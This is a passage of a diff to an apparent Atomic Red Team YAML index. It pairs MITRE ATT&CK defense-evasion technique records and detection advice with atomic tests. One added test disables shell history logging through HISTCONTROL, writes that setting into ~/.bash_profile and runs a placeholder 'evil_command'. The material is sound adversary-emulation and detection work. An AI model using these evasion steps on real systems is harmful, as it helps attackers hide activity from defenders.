evil_command: + description: Command to run after shell history collection is disabled + type: String + default: whoami + executor: + command: | + export HISTCONTROL=ignoreboth + #{evil_command} + name: sh + - name: Mac HISTCONTROL + auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d + description: "The HISTCONTROL variable is set to ignore (not write to the history + file) command that are a duplicate of something already in the history \nand + commands that start with a space. This atomic sets this variable in the current + session and also writes it to the current user's ~/.bash_profile \nso that + it will apply to all future settings as well.\nhttps://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol\n" + supported_platforms: + - macos + - linux + executor: + steps: | + 1. export HISTCONTROL=ignoreboth + 2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile + 3. ls + 4. whoami > recon.txt + name: manual T1562: technique: id: attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529 @@ -27244,7 +31111,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-07-09T14:43:42.718Z' + modified: '2020-10-19T16:31:35.249Z' created: '2020-02-21T20:22:13.470Z' x_mitre_platforms: - Linux @@ -27505,7 +31372,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-29T21:43:29.196Z' + modified: '2020-10-16T18:09:49.074Z' created: '2017-05-31T21:30:55.892Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -27548,8 +31415,19 @@ defense-evasion: elevation_required: true T1202: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2018-04-18T17:59:24.739Z' + modified: '2020-06-20T22:09:22.559Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Indirect Command Execution + description: |- + Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017) + + Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads. external_references: - source_name: mitre-attack external_id: T1202 @@ -27566,40 +31444,29 @@ defense-evasion: description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe (if you are watching for cmd.exe). Retrieved January 22, 2018. source_name: RSA Forfiles Aug 2017 - description: |- - Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017) - - Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads. - name: Indirect Command Execution - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-06-20T22:09:22.559Z' - created: '2018-04-18T17:59:24.739Z' - x_mitre_version: '1.1' - x_mitre_contributors: - - Matthew Demaske, Adaptforward + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows + x_mitre_permissions_required: + - User + x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms, + such as Sysmon, for events such as process creations that include or are resulting + from parameters associated with invoking programs/commands/files and/or spawning + child processes/network connections. (Citation: RSA Forfiles Aug 2017)' + x_mitre_defense_bypassed: + - Static File Analysis + - Application control + - Application control by file name or path x_mitre_data_sources: - File monitoring - Process monitoring - Process command-line parameters - Windows event logs - x_mitre_defense_bypassed: - - Static File Analysis - - Application control - - Application control by file name or path - x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms, - such as Sysmon, for events such as process creations that include or are resulting - from parameters associated with invoking programs/commands/files and/or spawning - child processes/network connections. (Citation: RSA Forfiles Aug 2017)' - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Windows - x_mitre_is_subtechnique: false + x_mitre_contributors: + - Matthew Demaske, Adaptforward + x_mitre_version: '1.1' identifier: T1202 atomic_tests: - name: Indirect Command Execution - pcalua.exe @@ -28532,6 +32399,21 @@ defense-evasion: name: powershell T1036.001: technique: + created: '2020-02-10T19:49:46.752Z' + modified: '2020-02-10T19:52:47.724Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52 + description: |- + Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017) + + Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature. + name: Invalid Code Signature + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1036.001 @@ -28540,34 +32422,19 @@ defense-evasion: url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/ description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and Signatures to Hide Binary Payloads. Retrieved September 10, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Invalid Code Signature - description: |- - Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017) - - Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature. - id: attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-02-10T19:52:47.724Z' - created: '2020-02-10T19:49:46.752Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: Collect and analyze signing certificate metadata and check - signature validity on software that executes within the environment, look - for invalid signatures as well as unusual certificate characteristics and - outliers. + x_mitre_platforms: + - macOS + - Windows x_mitre_data_sources: - File monitoring - Process monitoring - Binary file metadata - x_mitre_platforms: - - macOS - - Windows + x_mitre_detection: Collect and analyze signing certificate metadata and check + signature validity on software that executes within the environment, look + for invalid signatures as well as unusual certificate characteristics and + outliers. + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' atomic_tests: [] T1149: technique: @@ -28637,6 +32504,12 @@ defense-evasion: - source_name: mitre-attack external_id: T1574.006 url: https://attack.mitre.org/techniques/T1574/006 + - external_id: CAPEC-13 + source_name: capec + url: https://capec.mitre.org/data/definitions/13.html + - external_id: CAPEC-640 + source_name: capec + url: https://capec.mitre.org/data/definitions/640.html - source_name: Man LD.SO url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved @@ -28666,7 +32539,7 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-15T21:59:25.358Z' + modified: '2020-09-16T16:49:46.904Z' created: '2020-03-13T20:09:59.569Z' x_mitre_platforms: - Linux @@ -28679,7 +32552,7 @@ defense-evasion: Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' identifier: T1574.006 atomic_tests: - name: Shared Library Injection via /etc/ld.so.preload @@ -29431,7 +33304,7 @@ defense-evasion: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-07-13T21:23:01.762Z' + modified: '2020-10-21T02:41:11.743Z' created: '2020-02-11T19:01:56.887Z' x_mitre_data_sources: - File monitoring @@ -29462,12 +33335,13 @@ defense-evasion: used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access)." - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_platforms: - Windows - Linux - macOS + - Network atomic_tests: [] T1578: technique: @@ -29477,8 +33351,8 @@ defense-evasion: url: https://attack.mitre.org/techniques/T1578 - source_name: Mandiant M-Trends 2020 url: https://content.fireeye.com/m-trends/rpt-m-trends-2020 - description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved - April 24, 2020. + description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, + 2020. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -29492,7 +33366,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-19T14:46:00.117Z' + modified: '2020-09-14T19:55:23.798Z' created: '2019-08-30T18:03:05.864Z' x_mitre_detection: Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such @@ -29569,7 +33443,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-29T22:52:55.930Z' + modified: '2020-08-13T20:02:49.641Z' created: '2017-05-31T21:31:23.587Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -29581,7 +33455,7 @@ defense-evasion: x_mitre_detection: |- Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file. - Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis. + Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis. Monitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016). x_mitre_defense_bypassed: @@ -29596,7 +33470,7 @@ defense-evasion: - Bartosz Jerzman - Travis Smith, Tripwire - David Lu, Tripwire - x_mitre_version: '1.1' + x_mitre_version: '1.2' identifier: T1112 atomic_tests: - name: Modify Registry of Current User Profile - cmd @@ -29725,6 +33599,65 @@ defense-evasion: ' name: powershell + T1601: + technique: + external_references: + - source_name: mitre-attack + external_id: T1601 + url: https://attack.mitre.org/techniques/T1601 + - source_name: Cisco IOS Software Integrity Assurance - Image File Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Image File Verification. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Modify System Image + description: |- + Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file. + + To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device. + id: attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-10-22T17:50:47.635Z' + created: '2020-10-19T19:42:19.740Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - Administrator + x_mitre_detection: "Most embedded network devices provide a command to print + the version of the currently running operating system. Use this command to + query the operating system for its version number and compare it to what is + expected for the device in question. Because this method may be used in conjunction + with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), + it may be appropriate to also verify the integrity of the vendor provided + operating system image file. \n\nCompare the checksum of the operating system + file with the checksum of a known good copy from a trusted source. Some embedded + network device platforms may have the capability to calculate the checksum + of the file, while others may not. Even for those platforms that have the + capability, it is recommended to download a copy of the file to a trusted + computer to calculate the checksum with software that is not compromised. + \ (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany + vendors of embedded network devices can provide advanced debugging support + that will allow them to work with device owners to validate the integrity + of the operating system running in memory. If a compromise of the operating + system is suspected, contact the vendor technical support and seek such services + for a more thorough inspection of the current running system. (Citation: + Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)" + x_mitre_data_sources: + - Network device run-time memory + - Network device configuration + - File monitoring + x_mitre_platforms: + - Network + atomic_tests: [] T1218.005: technique: id: attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade @@ -30388,6 +34321,151 @@ defense-evasion: ' name: powershell + T1599.001: + technique: + created: '2020-10-19T16:48:08.241Z' + modified: '2020-10-21T01:45:58.951Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de + description: "Adversaries may bridge network boundaries by modifying a network + device’s Network Address Translation (NAT) configuration. Malicious modifications + to NAT may enable an adversary to bypass restrictions on traffic routing that + otherwise separate trusted and untrusted networks.\n\nNetwork devices such + as routers and firewalls that connect multiple networks together may implement + NAT during the process of passing packets between networks. When performing + NAT, the network device will rewrite the source and/or destination addresses + of the IP address header. Some network designs require NAT for the packets + to cross the border device. A typical example of this is environments where + internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen + an adversary gains control of a network boundary device, they can either leverage + existing NAT configurations to send traffic between two separated networks, + or they can implement NAT configurations of their own design. In the case + of network designs that require NAT to function, this enables the adversary + to overcome inherent routing limitations that would normally prevent them + from accessing protected systems behind the border device. In the case of + network designs that do not require NAT, address translation can be used by + adversaries to obscure their activities, as changing the addresses of packets + that traverse a network boundary device can make monitoring data transmissions + more challenging for defenders. \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) + to change the operating system of a network device, implementing their own + custom NAT mechanisms to further obscure their activities" + name: Network Address Translation Traversal + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1599.001 + url: https://attack.mitre.org/techniques/T1599/001 + - source_name: RFC1918 + url: https://tools.ietf.org/html/rfc1918 + description: IETF Network Working Group. (1996, February). Address Allocation + for Private Internets. Retrieved October 20, 2020. + x_mitre_platforms: + - Network + x_mitre_data_sources: + - Netflow/Enclave netflow + - Packet capture + x_mitre_detection: |- + Consider monitoring network traffic on both interfaces of border network devices. Compare packets transmitted by the device between networks to look for signs of NAT being implemented. Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3. In some cases, Port Address Translation (PAT) may also be used by an adversary. + + Monitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization. + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1599: + technique: + created: '2020-10-19T16:08:29.817Z' + modified: '2020-10-21T01:45:59.246Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166 + description: |- + Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. + + Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised. + + When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments. + name: Network Boundary Bridging + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1599 + url: https://attack.mitre.org/techniques/T1599 + x_mitre_platforms: + - Network + x_mitre_data_sources: + - Netflow/Enclave netflow + - Packet capture + x_mitre_detection: |- + Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question. Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device. + + Monitor the border network device’s configuration to validate that the policy enforcement sections are what was intended. Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized. + x_mitre_defense_bypassed: + - Router ACL + - Firewall + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' + atomic_tests: [] + T1556.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1556.004 + url: https://attack.mitre.org/techniques/T1556/004 + - source_name: FireEye - Synful Knock + url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html + description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful + Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Image File Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Image File Verification. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + description: |- + Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. + + [Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock) + name: Network Device Authentication + id: attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-10-21T02:41:11.550Z' + created: '2020-10-19T17:58:04.155Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification) + + Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). + x_mitre_data_sources: + - File monitoring + x_mitre_platforms: + - Network + atomic_tests: [] T1070.005: technique: external_references: @@ -30570,7 +34648,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:14:08.350Z' + modified: '2020-09-16T19:24:20.601Z' created: '2017-05-31T21:30:32.662Z' x_mitre_is_subtechnique: false x_mitre_version: '1.1' @@ -31405,64 +35483,168 @@ defense-evasion: Restart-Computer -Confirm name: powershell elevation_required: true + T1601.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1601.001 + url: https://attack.mitre.org/techniques/T1601/001 + - source_name: Killing the myth of Cisco IOS rootkits + url: https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf + description: Sebastian 'topo' Muñiz. (2008, May). Killing the myth of Cisco + IOS rootkits. Retrieved October 20, 2020. + - source_name: Killing IOS diversity myth + url: https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf + description: 'Ang Cui, Jatin Kataria, Salvatore J. Stolfo. (2011, August). + Killing the myth of Cisco IOS diversity: recent advances in reliable shellcode + design. Retrieved October 20, 2020.' + - source_name: Cisco IOS Shellcode + url: http://2015.zeronights.org/assets/files/05-Nosenko.pdf + description: 'George Nosenko. (2015). CISCO IOS SHELLCODE: ALL-IN-ONE. Retrieved + October 21, 2020.' + - source_name: Cisco IOS Forensics Developments + url: https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf + description: Felix 'FX' Lindner. (2008, February). Developments in Cisco IOS + Forensics. Retrieved October 21, 2020. + - source_name: Juniper Netscreen of the Dead + url: https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf + description: Graeme Neilson . (2009, August). Juniper Netscreen of the Dead. + Retrieved October 20, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Image File Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Image File Verification. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Patch System Image + description: "Adversaries may modify the operating system of a network device + to introduce new capabilities or weaken existing defenses.(Citation: Killing + the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: + Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: + Juniper Netscreen of the Dead) Some network devices are built with a monolithic + architecture, where the entire operating system and most of the functionality + of the device is contained within a single file. Adversaries may change this + file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo + change the operating system in storage, the adversary will typically use the + standard procedures available to device operators. This may involve downloading + a new file via typical protocols used on network devices, such as TFTP, FTP, + SCP, or a console connection. The original file may be overwritten, or a + new file may be written alongside of it and the device reconfigured to boot + to the compromised image.\n\nTo change the operating system in memory, the + adversary typically can use one of two methods. In the first, the adversary + would make use of native debug commands in the original, unaltered running + operating system that allow them to directly modify the relevant memory addresses + containing the running operating system. This method typically requires administrative + level access to the device.\n\nIn the second method for changing the operating + system in memory, the adversary would make use of the boot loader. The boot + loader is the first piece of software that loads when the device starts that, + in turn, will launch the operating system. Adversaries may use malicious + code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) + method, to directly manipulate running operating system code in memory. This + malicious code in the bootloader provides the capability of direct memory + manipulation to the adversary, allowing them to patch the live operating system + during runtime.\n\nBy modifying the instructions stored in the system image + file, adversaries may either weaken existing defenses or provision new capabilities + that the device did not have before. Examples of existing defenses that can + be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), + authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), + and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599). + \ Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), + [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port + Knocking](https://attack.mitre.org/techniques/T1205/001).\n\nAdversaries may + also compromise existing commands in the operating system to produce false + output to mislead defenders. When this method is used in conjunction with + [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one + example of a compromised system command may include changing the output of + the command that shows the version of the currently running operating system. + \ By patching the operating system, the adversary can change this command + to instead display the original, higher revision number that they replaced + through the system downgrade. \n\nWhen the operating system is patched in + storage, this can be achieved in either the resident storage (typically a + form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). + \n\nWhen the technique is performed on the running operating system in memory + and not on the stored copy, this technique will not survive across reboots. + \ However, live memory modification of the operating system can be combined + with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve + persistence. " + id: attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-10-22T17:50:46.560Z' + created: '2020-10-19T19:49:24.129Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification) + + Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification) + x_mitre_data_sources: + - Network device run-time memory + - Network device configuration + - File monitoring + x_mitre_platforms: + - Network + atomic_tests: [] T1574.007: technique: - id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32 + created: '2020-03-13T14:10:43.424Z' + modified: '2020-09-16T16:56:34.583Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1574.007 + url: https://attack.mitre.org/techniques/T1574/007 + - external_id: CAPEC-13 + source_name: capec + url: https://capec.mitre.org/data/definitions/13.html + - external_id: CAPEC-38 + source_name: capec + url: https://capec.mitre.org/data/definitions/38.html + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Path Interception by PATH Environment Variable description: |- Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line. The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program 